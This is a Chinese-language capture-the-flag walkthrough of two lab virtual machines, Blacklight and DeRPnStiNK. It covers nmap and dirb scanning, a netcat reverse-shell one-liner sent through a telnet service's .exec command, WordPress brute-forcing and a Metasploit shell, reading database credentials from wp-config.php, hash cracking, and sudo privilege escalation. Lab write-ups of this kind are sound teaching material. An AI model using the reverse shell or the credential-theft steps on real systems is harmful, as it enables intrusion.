渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

栏目: 编程工具 · 发布时间: 6年前

内容简介:挺久没更新靶机渗透文章,近期抽点时间继续更新文章,为什么这篇要2个靶机写在一起哪?因为第一个靶机虽然被困了几天但是其实比较简单故就和另外一个前段时间玩的合并在一起发表了….Blacklight靶机下载:

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

前言

挺久没更新靶机渗透文章,近期抽点时间继续更新文章,为什么这篇要2个靶机写在一起哪?因为第一个靶机虽然被困了几天但是其实比较简单故就和另外一个前段时间玩的合并在一起发表了….

靶机安装/下载

Blacklight靶机下载: https://pan.baidu.com/s/1n1A7UlgDUHL1RdmXN0CDPw

DeRPnStiNK靶机下载: https://pan.baidu.com/s/1ayCZ17PHxFe71vbldjGW2w

Blacklight靶机IP:172.16.24.92

DeRPnStiNK靶机IP:172.16.24.69

攻击者IP:172.16.24.31

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

实战

1.Blacklight靶机

老规矩nmap开路,个人习惯直接全端口….

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

通过端口探测可以看到该靶机开启了2个服务端口,一个是80,一个是9072端口,其中9072端口显示未知服务…. 我们还是继续先用80端口作为突破口,

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

界面还是比较简单的,我们使用目录爆破 工具 跑一下看看,小伙伴们可以自选,小弟还是继续使用kali上自带的 dirb (注:前面的文章中经常有小伙伴们说我的XX目录这么爆破不出来等等,个人觉得大家不应该局限于特定一款工具,可以多试几款多收集一些大的字典包)

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

简单的探测后可以看到 有个 “robots.txt” 根据经验有这个目录大部分是有价值得…访问看看

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

得到 flag1.txt blacklight.dict 2个目录

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

可以看到我们已经拿到了第一个flag:“fc4c7223964a26b152823d14f129687207e7fe15”,并告诉我们9072的秘密在首页?(“家?”),另外一个相信小伙伴们也看的出肯定是一个密码字典等等子类的

根据提示小弟在这里被卡了好几天…. 收集了该作者的github、blog首页、他写的一些项目啊一些跟MSF官方交流的信息啊等等等等,一个一个去搜索查看关于“9072”的线索结果都一无所获…本来都有点想放弃的,但是看他写的说该靶机说初学者级别,感觉脸上的巴掌印有点红….

最后操起本着都试试的心态,操起“banner-plus”插件探测一下看看,结果有发现…

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

发现一个 “.help” ? 那就直接命令 “telnet 172.16.24.92 9072”

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

我们跟着提示 输入 “.help”

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵
渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

第一个为读取hash,我们试着用刚刚那个字典破解一下…(其实可以完全不用)

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

我们其实只需要用到 “.exec” 就行了

命令:.exec rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 172.16.24.31 5555 >/tmp/f (外面要加一个”“”)

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

注:这里只有2次的命令输入机会,超过了需要重启靶机

可以看到我们已经拿到了shell。。 且权限为root

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

该靶机完!是不是很简单….

2.DeRPnStiNK靶机

老规矩!nmap开路

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

可以看到开放了多个端口服务,我们还是用80端口作为我们的突破口,使用命令:

curl http://172.16.24.69

拿到第一个flag

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

(注:该flag通过访问网页查看源码是看不到的哦)

下一步还是跟真实渗透环境中一样跑一下目录,

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

可以看到找到了比较多的目录,如“/php”、“/weblog/”等等

我们访问 http://172.16.24.69/webnotes/info.txt

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

让我们添加上本地DNS转换,结合上访问“/weblog”目录在浏览器左下角一直在请求连接“derpnstink.local” 如图:

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

那下一步肯定就在 /etc/hosts 里写入地址,如图

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

我们继续访问

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

可以看到页面已经能正常访问了,通过前面的目录扫描已经知道它使用的WP搭建的网站,下面我们直接使用wpscan来扫描该web,顺便加载上自己的字典看能不能爆破出账号密码,如图:

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

通过扫描结果可以看到,还是挺幸运的 成功扫描出几个漏洞和爆破出账号密码,都为”admin”,下一步肯定是登陆拿shell,我相信这肯定难不倒聪明的各位,小弟这里使用MSF来帮忙完成(这个模块小弟前面的文章有使用过来,这里就不多说了..),如图:

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

为了文章演示方便,小弟上个了webshell…

下面我们查看 “wp-config.php” 拿 mysql 密码

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

得到账号:”root”,密码:”mysql”

我们在跑目录的时候已经知道 “/php”目录下面就是 phpmyadmin,为了演示方便,小弟使用phpmyadmin来登陆操作

http://derpnstink.local/php/phpmyadmin/index.php

登陆后在 “wp-posts”拿到flag2

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

在 “wp-user” 拿到hash密文:“$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41”,

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

可以先辨别一些hash密文的类型

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

下一步肯定是猜解这个密文,小伙伴们可以使用“hashcat”,命令为:

hashcat -a 0 -m 400 xx.hash mima.txt

因小弟电脑未安装GPU补丁程序,故小弟使用john来完成这个工作

得到密码为:wedgie57 账号为:stinky

我们使用得到的账号密码登陆FTP

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

成功登陆并得到了2个文件,一个如图为与一个“mrderp”用户对话记录

另一个为 ssh 的登陆密钥,如图:

ftp:// stinky@172.16.24 .69/files/ssh/ssh/ssh/ssh/ssh/ssh/key.txt

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

我们把密钥复制到本地,然后去登陆ssh,如图:

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

已经成功登陆!(注:此处的key.txt 必须要给足权限,否则无法登陆)

下一步拿flag

flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

我们继续翻目录,在/Documents 下发现一个 “derpissues.pcap”握手包,

我们down下来分析看看,命令:

scp -i key.txt stinky@172.16.24 .69:/home/stinky/Documents/derpissues.pcap /tmp/derp.pcap

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

我们载入wireshark分析,拿到“mrderp”密码,如图:

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

密码为:“derpderpderpderpderpderpderp”

下面我们切换账号登陆试试

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

可以看到已经切换成功并在桌面发现一个“helpdesk.log”文件

下面我们试着切换看看能不能成功,输入命令“sudo -l”

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵 出现一个关键词:(ALL) /home/mrderp/binaries/derpy*

本来这个目录下面是没有“/binaries/”目录的,我们可以创建这个目录和前面包含“derpy”的文件,如图:

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

并在文件内写入 “/bin/bash” 保存。最后一步就是直接拿root了,

命令为: sudo ./derpy.sh

如图:

渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

成功拿下root权限和flag4!!

总结

没什么好说的,这是小弟的联系方式:

56477853576b31736345565a656b4a50596c567264316473556c4a4e617a5656566c524f55464a47576d395561314a755456557863565a55546b39686132743556316477616d51774e55685856455a50595773784d315273556c704e617a4656566c525754315a476133705556564a57546b553163565655516b39575230313356477853576b31564d584658625842505a577446656c5178556c5a4e617a56305646524b55464a47634842556258424b54555531635656746145396c617a423456466877595746724e545a5256455a61566b5a4b636c5272556c704e565456565758705354315a4863336c58563342585955553153464e55526b3968624656355647786b526b30774d545a5756453550596c5577656c5256556c5a4f525456565646524354315a47536d395562464a47545655316356647463453957526d743556465a53566b35564e56565856454a51566b644e4d465273556d704e624842565656524b54315a4854586c55563342535457733157464a55546b3553526c563556473078536b31564e58465857476850566b644e64315274634664685254564657587047543256736348465562475247545778734e6c5a596245356c6130593256477853566b35464e5656585748424f5957314e4d4652756345354e617a465656323177543149775658685562464a615a56553152566b7a63464257526c707656477853576b31464e565657625768505957745665465272556c5a4e4d445532576e704b546c5a47566a5655574842475454417852565655566b39574d46563356473177576b35464e584661656b7050566b5a77635652735a455a4e52546c46566c524b54314a48545870554d464a615a5555315656645963453557526c707656473577546b31564e545a5862577850566a425665465177556c706c56545646566c5247576c5a475654425562464a795456553152565655536b396c6255313456473177546d56464e545a5256455a51556b5a7265465272556c704e526e42565632317354315a4762445a5556564a4f5456553152567036526b39575254453156473577546d56724d56565756455a4f5a57747264316457556c5a4f56545678556c524354314a47566a565562464a715457737863565a55556b396862574e3456477453566b31564e58525356454a50595778574e56527463465a4e52545678563152435432567261336858566c4a535454413163567036516d4657526b707956473078566b31724f55565762576850566b5a7265566457556c4a6c5654563056315247546c5a464d54525562464a795454413552565a55526b39695654423556477453566b30774e56565856454a50566b5a6162315273556d354e5654567856323130543256724d545a55566c4a575457733164465255526b39575230307856473177566b31464f55565856454a505957316a654652586345356b4d4455325556524355465a47576d395561314a5754565578635656744d553957526d773256465a53556b35564e486c5356455a50566b5a77633152725a455a4e565455325657313054324a575658645862464a4f545555315657457a634535686255343256473577626b31564e545a5756457050556a4256656c525963465a4e4d4456305646524b54314a47566a5a5562464a615455553163565a74614539575257743456473177595745774d545a535748424f556b5a56655652596345704e526e42565758704354315a4761336c58563342615455553156566455536b3568624842785647746b526b30774d56565756455a50596c5a46656c5177556d704e4d44565656566877546c5a47576d3955626e424f5456553156566474624539574d46563356327853576d56564e55565856455a505957737764315273556c704e5654553257544e77546d567356586855625842575454413153464a55516b39686247773256477453566b31724f555657564570505957747265465177556c4a6c56545678576e704754324673634846556258425354555a7363565a596245356c6131563356327853616b31564e58465456454a505957785665565273556d704e617a46785656524b54315a4762445a5561314a575457733152566b7a634535575254423356477853576d56724d58465757477850556b646a654652586347466856545659556c5247546c4a4756586c556254464b5a57733156565a55516b3957526b563456473577616d56724d545a5256454a68556b5a56655652735a455a4e4d444678566d316f54314a4752586455563342575457733153465655526b39686246707656473577636b31564e55565756457050566b5a7265565257556c5a4e52544532556c5247576c5a48546a5a5562464a71545778734e6c6474634539575230313556465a53546d56464e56685356457051556b5a5665565273556c5a4e566d78565631686f543246724d486c5857484261545555314e6c5a55526b3953526e427756466877636b31564d545a5857477850556b5a56656c5256556c706c525456565758704754314a47526a565562464a715456553556565a55536b39575257743656466877566d56724e58525556455a5059577856656c52746345704e624842465631525354315a485933685562464a68595441784e6c4a55536d46686245707956466877526b31576246565656455a50566b567265566472556c4a4e617a56565646524359564a4756586c55626e424354565a7356565a55546b39695657743456315a53566b30774e58465356455a505957787264315272556c704e565445325632317754315a4661336855626e42575a56553164465255546b3553526c56365647786b526b31564e56565756455a4f5a57745665565272556c4a4e617a5649556c524f546c5a47565870556254464f54555a7756566455556b39686246563556316877563246464e56565756455a5059577856656c525963455a6c617a5646566c524f54324a5662445a55566c4a535454413156566c36536c70686247743356477853576b31724d56565557484250566b56726546527563465a4f5654563056465247576c5a476244525562584257545778734e6c64746245396c6255313456473177595746564e545a5656455a5059577856655652744d55354e4d4446465656524b54315a4756586855625842575a5655314e6c4e55526b3553526c59305646524b556d567363454a5156444139

你能破解了出来了吗?坏笑!! 祝大家生活愉快!


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Processing编程学习指南(原书第2版)

Processing编程学习指南(原书第2版)

[美]丹尼尔希夫曼(Daniel Shiffman) / 李存 / 机械工业出版社 / 2017-3-1 / 99.00元

在视觉化界面中学习电脑编程的基本原理! 本书介绍了编程的基本原理,涵盖了创建最前沿的图形应用程序(例如互动艺术、实时视频处理和数据可视化)所需要的基础知识。作为一本实验风格的手册,本书精心挑选了部分高级技术进行详尽解释,可以让图形和网页设计师、艺术家及平面设计师快速熟悉Processing编程环境。 从算法设计到数据可视化,从计算机视觉到3D图形,在有趣的互动视觉媒体和创意编程的背景之......一起来看看 《Processing编程学习指南(原书第2版)》 这本书的介绍吧!

JS 压缩/解压工具
JS 压缩/解压工具

在线压缩/解压 JS 代码

JSON 在线解析
JSON 在线解析

在线 JSON 格式化工具

html转js在线工具
html转js在线工具

html转js在线工具